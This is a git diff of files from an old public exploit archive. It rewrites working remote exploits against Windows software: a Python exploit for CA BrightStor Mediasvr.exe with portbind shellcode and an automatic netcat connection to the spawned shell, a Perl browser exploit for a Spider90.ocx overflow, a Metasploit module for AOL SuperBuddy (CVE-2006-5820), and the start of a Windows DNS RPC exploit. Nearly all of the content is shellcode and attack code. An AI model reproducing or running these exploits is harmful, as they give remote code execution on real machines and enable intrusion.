-rpc_packet2+="\x02\x00\x06\x09\x7e\x00\x00\x00\x01"
-
-#Procedure 191 and nulls
-rpc_packet2+="\x00\x00\x00\xbf\x00\x00\x00\x00\x00\x00\x00\x00"
-
-#Apparently these 4 bytes can be anything
-rpc_packet2+="\x00\x00\x00\x00"
-
-#This value is important for the location of the next address
-rpc_packet2+="\x00\x00\x00\x00"
-
-#Hardcoded Address loaded into ECX that seems to be hit after Mediasvr.exe has been
-#restarted
-rpc_packet2+="\x00\x9e\x27\x64"
-
-#Just spacing
-rpc_packet2+="\x41\x42\x43\x44"
-
-#Addess stored in memory, loaded into EAX and called with EAX+2Ch to get to shellcode
-rpc_packet2+="\x3c\x27\x9e\x00"
-
-#jump to shellcode for packet 2
-rpc_packet2+="\x6c\x27\x9e\x00"
-rpc_packet2+="\xeb\x01"
-rpc_packet2+=shellcode
-
-# Portmap request for Mediasvr.exe
-rpc_portmap_req="\x80\x00\x00\x38\x21\x84\xf7\xc9\x00\x00\x00\x00\x00\x00\x00"
-rpc_portmap_req+="\x02\x00\x01\x86\xa0\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00"
-rpc_portmap_req+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-rpc_portmap_req+="\x06\x09\x7e\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x00"
-
-#------------------------------------------------------------------------
-
-def GetMediaSvrPort(target):
-    sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
-    sock.connect((target,111))
-    sock.send(rpc_portmap_req)
-    rec = sock.recv(256)
-    sock.close()
-
-    port1 = rec[-4]
-    port2 = rec[-3]
-    port3 = rec[-2]
-    port4 = rec[-1]   
-   
-    port1 = hex(ord(port1))
-    port2 = hex(ord(port2))
-    port3 = hex(ord(port3))
-    port4 = hex(ord(port4))
-    port = '%02x%02x%02x%02x' % (int(port1,16),int(port2,16),int(port3,16),int(port4,16))
-   
-    port = int(port,16)
-    if port < 1100:
-        print '[+] Fresh Meat: Mediasvr.exe has not been restarted, Sending Packet 1 to: Target: %s Port: %s' %(target,port)
-        ExploitMediaSvr(target,port,1)
-    else:
-        print '[+] Mediasvr.exe has been restarted, Sending Packet 2 to: Target: %s Port: %s' % (target,port)
-        ExploitMediaSvr(target,port,2)
-
-def ExploitMediaSvr(target,port,p):
-    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-    sock.connect((target, port))
-    if p == 1:
-        sock.send(rpc_packet1)    
-    elif p == 2:
-        sock.send(rpc_packet2)
-       sock.close ()
-
-
-if __name__=="__main__":
-       try:
-               target = sys.argv[1]
-       except IndexError:
-        print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Exploit'
-               print '[+] Author: Shirkdog'
-                   print '[+] Usage: %s \n' % sys.argv[0]
-                   sys.exit(-1)
-
-       print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Exploit'
-       print '[+] Author: Shirkdog'
-
-       GetMediaSvrPort(target)
-           
-       print '[+] Exploit sent. Using nc to connect to: %s on port 4444' % target
-       time.sleep(3)
-       connect = "/usr/bin/nc -vn " + target + " 4444"
-       os.system(connect)
-
-# milw0rm.com [2007-03-29]
+#!/usr/bin/python
+#
+# Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Code Exploit
+# (Previously Unknown)
+#
+# There seems to be an design error in the handling of RPC data with xdr procedures
+# across several .dll's imported by Mediasvr.exe. Four bytes from an RPC packet are
+# processed as a particular address (xdr_handle_t data which is run through multiple bit
+# shifts, and reversing of bytes), and eventually loaded into ECX.
+#
+# The 191 (0xbf) procedure, followed by nulls (at least 8 bytes of nulls, which may
+# be Null Credentials and Auth?) leads to an exploitable condition.
+#
+# .text:0040AACD 008                 mov     ecx, [esp+8]
+# .text:0040AAD1 008                 mov     dword_418820, esi
+# .text:0040AAD7 008                 push    offset dword_418820
+# .text:0040AADC 00C                 mov     eax, [ecx]
+# .text:0040AADE 00C                 call    dword ptr [eax+2Ch]
+#
+# At this point, you have control of ECX (esp+8 is your address data). The data from the packet
+# is stored in memory and is relatively static (see NOTE).
+#
+# The address is then loaded into EAX, and then called as EAX+2Ch, which is
+# controllable data from the packet. In this code, I just jump ahead to
+# the portbinding shellcode.
+#
+# NOTE: The only issue I have found is when the system is rebooted, the packet data
+# appears at a higher memory location when Mediasvr.exe crashes
+# and is restarted. I have accounted for this in the code, when the port that
+# Mediasvr.exe is listening on is below TCP port 1100, which is usually only after
+# a reboot
+#
+# This was tested on BrightStor ARCserve Backup 11.5.2.0 (SP2) with the latest
+# CA patches on Windows XP SP2 (I believe there is some issue with SP1, which
+# is more then likely the memory locations)
+#
+# The patches include the following updates to Mediasvr.exe
+# http://supportconnectw.ca.com/public/storage/infodocs/babimpsec-notice.asp
+#
+# CA has been notified
+#
+# Author: M. Shirk
+# Tester: Tebodell
+#
+# (c) Copyright 2007 (Shirkdog Security) shirkdog_list $ at % hotmail dot com
+#
+# Use at your own Risk: You have been warned
+#------------------------------------------------------------------------
+
+import os
+import sys
+import time
+import socket
+import struct
+
+#------------------------------------------------------------------------
+
+#Portbind shellcode; Binds shell on TCP port 4444
+shellcode  = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+shellcode += "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
+shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58"
+shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57"
+shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38"
+shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58"
+shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
+shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
+shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48"
+shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54"
+shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58"
+shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d"
+shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38"
+shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56"
+shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36"
+shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57"
+shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
+shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e"
+shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30"
+shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35"
+shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34"
+shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41"
+shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a"
+shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31"
+shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
+shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d"
+shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d"
+shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56"
+shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45"
+shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46"
+shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c"
+shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c"
+shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32"
+shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36"
+shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f"
+shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36"
+shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56"
+shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56"
+shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f"
+shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
+shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d"
+shellcode += "\x4f\x4f\x42\x4d\x5a\x90"
+
+#------------------------------------------------------------------------
+
+#First Packet
+rpc_packet1="\x80\x00\x80\x34\x65\xcf\x4c\x7b\x00\x00\x00\x00\x00\x00\x00"
+rpc_packet1+="\x02\x00\x06\x09\x7e\x00\x00\x00\x01"
+
+#Prodcedure 191 and nulls
+rpc_packet1+="\x00\x00\x00\xbf\x00\x00\x00\x00\x00\x00\x00\x00"
+
+#Apparently these 4 bytes can be anything
+rpc_packet1+="\x00\x00\x00\x00"
+
+#This value is important for the location of the next address
+rpc_packet1+="\x00\x00\x00\x00"
+
+#Hardcoded Address loaded into ECX
+rpc_packet1+="\x00\xae\x27\x64"
+
+#Just spacing
+rpc_packet1+="\x41\x42\x43\x44"
+
+#Addess in memory, loaded into EAX and called with EAX+2Ch to get to shellcode
+rpc_packet1+="\x3c\x27\xae\x00"
+
+#jump to shellcode for packet 1
+rpc_packet1+="\x6c\x27\xae\x00"
+rpc_packet1+="\xeb\x01"
+rpc_packet1+=shellcode
+
+#------------------------------------------------------------------------
+
+#Second Packet
+rpc_packet2="\x80\x00\x80\x34\x65\xcf\x4c\x7b\x00\x00\x00\x00\x00\x00\x00"
+rpc_packet2+="\x02\x00\x06\x09\x7e\x00\x00\x00\x01"
+
+#Procedure 191 and nulls
+rpc_packet2+="\x00\x00\x00\xbf\x00\x00\x00\x00\x00\x00\x00\x00"
+
+#Apparently these 4 bytes can be anything
+rpc_packet2+="\x00\x00\x00\x00"
+
+#This value is important for the location of the next address
+rpc_packet2+="\x00\x00\x00\x00"
+
+#Hardcoded Address loaded into ECX that seems to be hit after Mediasvr.exe has been
+#restarted
+rpc_packet2+="\x00\x9e\x27\x64"
+
+#Just spacing
+rpc_packet2+="\x41\x42\x43\x44"
+
+#Addess stored in memory, loaded into EAX and called with EAX+2Ch to get to shellcode
+rpc_packet2+="\x3c\x27\x9e\x00"
+
+#jump to shellcode for packet 2
+rpc_packet2+="\x6c\x27\x9e\x00"
+rpc_packet2+="\xeb\x01"
+rpc_packet2+=shellcode
+
+# Portmap request for Mediasvr.exe
+rpc_portmap_req="\x80\x00\x00\x38\x21\x84\xf7\xc9\x00\x00\x00\x00\x00\x00\x00"
+rpc_portmap_req+="\x02\x00\x01\x86\xa0\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00"
+rpc_portmap_req+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+rpc_portmap_req+="\x06\x09\x7e\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x00"
+
+#------------------------------------------------------------------------
+
+def GetMediaSvrPort(target):
+    sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+    sock.connect((target,111))
+    sock.send(rpc_portmap_req)
+    rec = sock.recv(256)
+    sock.close()
+
+    port1 = rec[-4]
+    port2 = rec[-3]
+    port3 = rec[-2]
+    port4 = rec[-1]   
+   
+    port1 = hex(ord(port1))
+    port2 = hex(ord(port2))
+    port3 = hex(ord(port3))
+    port4 = hex(ord(port4))
+    port = '%02x%02x%02x%02x' % (int(port1,16),int(port2,16),int(port3,16),int(port4,16))
+   
+    port = int(port,16)
+    if port < 1100:
+        print '[+] Fresh Meat: Mediasvr.exe has not been restarted, Sending Packet 1 to: Target: %s Port: %s' %(target,port)
+        ExploitMediaSvr(target,port,1)
+    else:
+        print '[+] Mediasvr.exe has been restarted, Sending Packet 2 to: Target: %s Port: %s' % (target,port)
+        ExploitMediaSvr(target,port,2)
+
+def ExploitMediaSvr(target,port,p):
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    sock.connect((target, port))
+    if p == 1:
+        sock.send(rpc_packet1)    
+    elif p == 2:
+        sock.send(rpc_packet2)
+       sock.close ()
+
+
+if __name__=="__main__":
+       try:
+               target = sys.argv[1]
+       except IndexError:
+        print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Exploit'
+               print '[+] Author: Shirkdog'
+                   print '[+] Usage: %s \n' % sys.argv[0]
+                   sys.exit(-1)
+
+       print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Exploit'
+       print '[+] Author: Shirkdog'
+
+       GetMediaSvrPort(target)
+           
+       print '[+] Exploit sent. Using nc to connect to: %s on port 4444' % target
+       time.sleep(3)
+       connect = "/usr/bin/nc -vn " + target + " 4444"
+       os.system(connect)
+
+# milw0rm.com [2007-03-29]
diff --git a/platforms/windows/remote/361.txt b/platforms/windows/remote/361.txt
index 265871e54..7412b7f54 100755
--- a/platforms/windows/remote/361.txt
+++ b/platforms/windows/remote/361.txt
@@ -39,6 +39,6 @@ ftp> cd /
 501 Cannot accept relative path using dot notation
 ftp> pwd
 ---> XPWD
-257 "/C:/" is current directory.
-
-# milw0rm.com [2004-07-22]
+257 "/C:/" is current directory.
+
+# milw0rm.com [2004-07-22]
diff --git a/platforms/windows/remote/3661.pl b/platforms/windows/remote/3661.pl
index 237586c42..f3d674a90 100755
--- a/platforms/windows/remote/3661.pl
+++ b/platforms/windows/remote/3661.pl
@@ -1,112 +1,112 @@
-#!/usr/bin/perl
-# POC exploit for Mercury Quality Center Spider90.ocx ProgColor Overflow
-# credit to Skylined, Trirat Puttaraksa, HDM Skape and the rest of the
-# metasploit crew. This exploit is just a cut and paste of thier code they # deserve the credit 
-# Vulnerability found by Titon and Ri0t of Bastardlabs  
-
-use strict;
-
-# win32_bind LPORT = 5555 - Metasploit
-my $shellcode =
-"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
-"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49".
-"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d".
-"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66".
-"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61".
-"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40".
-"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32".
-"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6".
-"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09".
-"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0".
-"\x66\x68\x15\xb3\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff".
-"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53".
-"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff".
-"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64".
-"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89".
-"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab".
-"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51".
-"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53".
-"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6".
-"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0";
-
-my $jscript =
-"";
-
-my $header =
-"\n" .
-"\n" .
-"\n" .
-$jscript .
-"\n";
-
-my $footer =
-"\n" .
-"";
-
-my $body = 
-"\n" .
-"\n" .
-"\n" .
-"\n" .
-"";
-
-my $page = "\xff\xfe";	# magic number of M$ unicode file
-my $c;
-
-
-foreach $c (split //, ($header)) {
-	$page = $page . $c . "\x00";
-}
-
-
-
-foreach $c (split //, ($body . $footer)) {
-	$page = $page . $c . "\x00";
-}
-
-open (IE, ">", "exploit.html");
-
-print IE $page;
-
-close IE;
-
-# This function copy from JSUnescape() code in Metasploit
-sub convert_shellcode {
-	my $data = shift;
-	my $mode = shift() || 'LE';
-	my $code = '';
-	
-	# Encode the shellcode via %u sequences for JS's unescape() function
-	my $idx = 0;
-	
-	# Pad to an even number of bytes
-	if (length($data) % 2 != 0) {
-		$data .= substr($data, -1, 1);
-	}
-	
-	while ($idx < length($data) - 1) {
-		my $c1 = ord(substr($data, $idx, 1));
-		my $c2 = ord(substr($data, $idx+1, 1));	
-		if ($mode eq 'LE') {
-			$code .= sprintf('%%u%.2x%.2x', $c2, $c1);	
-		} else {
-			$code .= sprintf('%%u%.2x%.2x', $c1, $c2);	
-		}
-		$idx += 2;
-	}
-	
-	return $code;
-}
-
-# milw0rm.com [2007-04-04]
+#!/usr/bin/perl
+# POC exploit for Mercury Quality Center Spider90.ocx ProgColor Overflow
+# credit to Skylined, Trirat Puttaraksa, HDM Skape and the rest of the
+# metasploit crew. This exploit is just a cut and paste of thier code they # deserve the credit 
+# Vulnerability found by Titon and Ri0t of Bastardlabs  
+
+use strict;
+
+# win32_bind LPORT = 5555 - Metasploit
+my $shellcode =
+"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
+"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49".
+"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d".
+"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66".
+"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61".
+"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40".
+"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32".
+"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6".
+"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09".
+"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0".
+"\x66\x68\x15\xb3\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff".
+"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53".
+"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff".
+"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64".
+"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89".
+"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab".
+"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51".
+"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53".
+"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6".
+"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0";
+
+my $jscript =
+"";
+
+my $header =
+"\n" .
+"\n" .
+"\n" .
+$jscript .
+"\n";
+
+my $footer =
+"\n" .
+"";
+
+my $body = 
+"\n" .
+"\n" .
+"\n" .
+"\n" .
+"";
+
+my $page = "\xff\xfe";	# magic number of M$ unicode file
+my $c;
+
+
+foreach $c (split //, ($header)) {
+	$page = $page . $c . "\x00";
+}
+
+
+
+foreach $c (split //, ($body . $footer)) {
+	$page = $page . $c . "\x00";
+}
+
+open (IE, ">", "exploit.html");
+
+print IE $page;
+
+close IE;
+
+# This function copy from JSUnescape() code in Metasploit
+sub convert_shellcode {
+	my $data = shift;
+	my $mode = shift() || 'LE';
+	my $code = '';
+	
+	# Encode the shellcode via %u sequences for JS's unescape() function
+	my $idx = 0;
+	
+	# Pad to an even number of bytes
+	if (length($data) % 2 != 0) {
+		$data .= substr($data, -1, 1);
+	}
+	
+	while ($idx < length($data) - 1) {
+		my $c1 = ord(substr($data, $idx, 1));
+		my $c2 = ord(substr($data, $idx+1, 1));	
+		if ($mode eq 'LE') {
+			$code .= sprintf('%%u%.2x%.2x', $c2, $c1);	
+		} else {
+			$code .= sprintf('%%u%.2x%.2x', $c1, $c2);	
+		}
+		$idx += 2;
+	}
+	
+	return $code;
+}
+
+# milw0rm.com [2007-04-04]
diff --git a/platforms/windows/remote/3662.rb b/platforms/windows/remote/3662.rb
index 8cb5686f3..ffe038c5a 100755
--- a/platforms/windows/remote/3662.rb
+++ b/platforms/windows/remote/3662.rb
@@ -1,125 +1,124 @@
-
-require 'msf/core'
-
-module Msf
-
-class Exploits::Windows::Browser::AOL_SuperBuddy_LinkSBIcons < Msf::Exploit::Remote
-
-	include Exploit::Remote::HttpServer::HTML
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'AOL Sb.Superbuddy vulnerability',
-			'Description'    => %q{
-				This module exploits a flaw in AOL Sb.SuperBuddy. We stole this code from a pre-existing metasploit module.
-			},
-			'License'        => MSF_LICENSE,
-			'Author'         => 
-				[ 
-					'kradchad',
-					'leetpete'
-				],
-			'Version'        => '0.1',
-			'References'     => 
-				[
-					[ 'CVE', 'CVE-2006-5820']
-				],
-			'Payload'        =>
-				{
-					'Space'          => 1024,
-					'BadChars'       => "\x00",
-	
-				},
-			'Platform'       => 'win',
-			'Targets'        =>
-				[
-					['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ]
-				],
-			'DefaultTarget'  => 0))
-	end
-
-	def autofilter
-		false
-	end
-	
-	def on_request_uri(cli, request)
-
-		# Re-generate the payload
-		return if ((p = regenerate_payload(cli)) == nil)
-
-		# Encode the shellcode
-		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
-		
-		# Get a unicode friendly version of the return address
-		addr_word  = [target.ret].pack('V').unpack('H*')[0][0,4]
-
-		# Randomize the javascript variable names	
-		var_buffer    = rand_text_alpha(rand(30)+2)
-		var_shellcode = rand_text_alpha(rand(30)+2)
-		var_unescape  = rand_text_alpha(rand(30)+2)
-		var_x         = rand_text_alpha(rand(30)+2)
-		var_i         = rand_text_alpha(rand(30)+2)
-		var_tic       = rand_text_alpha(rand(30)+2)
-		var_toc       = rand_text_alpha(rand(30)+2)
-		
-		# Randomize HTML data
-		html          = rand_text_alpha(rand(30)+2)
-		
-		# Build out the message
-		content = %Q|
-
-
-	
-
-
-#{html}
-
-		
-		|
-
-		# Randomize the whitespace in the document
-		content.gsub!(/\s+/) do |s|
-			len = rand(100)+2
-			set = "\x09\x20\x0d\x0a"
-			buf = ''
-			
-			while (buf.length < len)
-				buf << set[rand(set.length)].chr
-			end
-			
-			buf
-		end
-		
-		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
-
-		# Transmit the response to the client
-		send_response_html(cli, content)
-	end
-
-end
-
-end
-
-# milw0rm.com [2007-04-04]
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Browser::AOL_SuperBuddy_LinkSBIcons < Msf::Exploit::Remote
+
+	include Exploit::Remote::HttpServer::HTML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'AOL Sb.Superbuddy vulnerability',
+			'Description'    => %q{
+				This module exploits a flaw in AOL Sb.SuperBuddy. We stole this code from a pre-existing metasploit module.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         => 
+				[ 
+					'kradchad',
+					'leetpete'
+				],
+			'Version'        => '0.1',
+			'References'     => 
+				[
+					[ 'CVE', 'CVE-2006-5820']
+				],
+			'Payload'        =>
+				{
+					'Space'          => 1024,
+					'BadChars'       => "\x00",
+	
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ]
+				],
+			'DefaultTarget'  => 0))
+	end
+
+	def autofilter
+		false
+	end
+	
+	def on_request_uri(cli, request)
+
+		# Re-generate the payload
+		return if ((p = regenerate_payload(cli)) == nil)
+
+		# Encode the shellcode
+		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
+		
+		# Get a unicode friendly version of the return address
+		addr_word  = [target.ret].pack('V').unpack('H*')[0][0,4]
+
+		# Randomize the javascript variable names	
+		var_buffer    = rand_text_alpha(rand(30)+2)
+		var_shellcode = rand_text_alpha(rand(30)+2)
+		var_unescape  = rand_text_alpha(rand(30)+2)
+		var_x         = rand_text_alpha(rand(30)+2)
+		var_i         = rand_text_alpha(rand(30)+2)
+		var_tic       = rand_text_alpha(rand(30)+2)
+		var_toc       = rand_text_alpha(rand(30)+2)
+		
+		# Randomize HTML data
+		html          = rand_text_alpha(rand(30)+2)
+		
+		# Build out the message
+		content = %Q|
+
+
+	
+
+
+#{html}
+
+		
+		|
+
+		# Randomize the whitespace in the document
+		content.gsub!(/\s+/) do |s|
+			len = rand(100)+2
+			set = "\x09\x20\x0d\x0a"
+			buf = ''
+			
+			while (buf.length < len)
+				buf << set[rand(set.length)].chr
+			end
+			
+			buf
+		end
+		
+		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
+
+		# Transmit the response to the client
+		send_response_html(cli, content)
+	end
+
+end
+
+end
+
+# milw0rm.com [2007-04-04]
diff --git a/platforms/windows/remote/3737.py b/platforms/windows/remote/3737.py
index d57560f2d..0b5f5050f 100755
--- a/platforms/windows/remote/3737.py
+++ b/platforms/windows/remote/3737.py
@@ -1,111 +1,111 @@
-#!/usr/bin/python
-# Remote exploit for the 0day Windows DNS RPC service vulnerability as
-# described in http://www.securityfocus.com/bid/23470/info. Tested on
-# Windows 2000 SP4. The exploit if successful binds a shell to TCP port 4444
-# and then connects to it.
-#
-# Cheers to metasploit for the first exploit.
-# Written for educational and testing purposes.
-# Author shall bear no responsibility for any damage caused by using this code
-# Winny Thomas :-)
-
-import os
-import sys
-import time
-from impacket.dcerpc import transport, dcerpc, epm
-from impacket import uuid
-
-#Portbind shellcode from metasploit; Binds port to TCP port 4444
-shellcode  = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
-shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9"
